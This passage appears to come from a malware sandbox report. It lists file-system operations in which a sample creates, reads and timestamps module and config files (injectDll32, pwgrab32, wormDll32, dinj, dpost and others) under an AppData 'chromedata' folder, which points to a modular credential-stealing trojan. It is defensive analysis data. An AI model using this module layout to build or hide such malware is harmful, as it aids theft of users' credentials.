|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | Data\ | - |
|
1 | |
| Create Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs | - |
|
1 | |
| Create Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs | - |
|
1 | |
| Create Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs | - |
|
1 | |
| Create Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs | - |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
3 | |
| Get Info | Data\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\ | type = file_attributes |
|
4 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\ | type = file_attributes |
|
1 | |
| Get Info | ver.txt | type = file_attributes |
|
1 | |
| Get Info | settings.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
